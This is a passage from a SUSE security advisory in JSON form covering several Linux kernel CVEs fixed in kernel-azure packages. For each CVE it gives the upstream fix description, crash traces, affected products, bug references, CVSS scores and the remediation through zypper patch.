"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23010",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23010"
}
],
"notes": [
{
"category": "general",
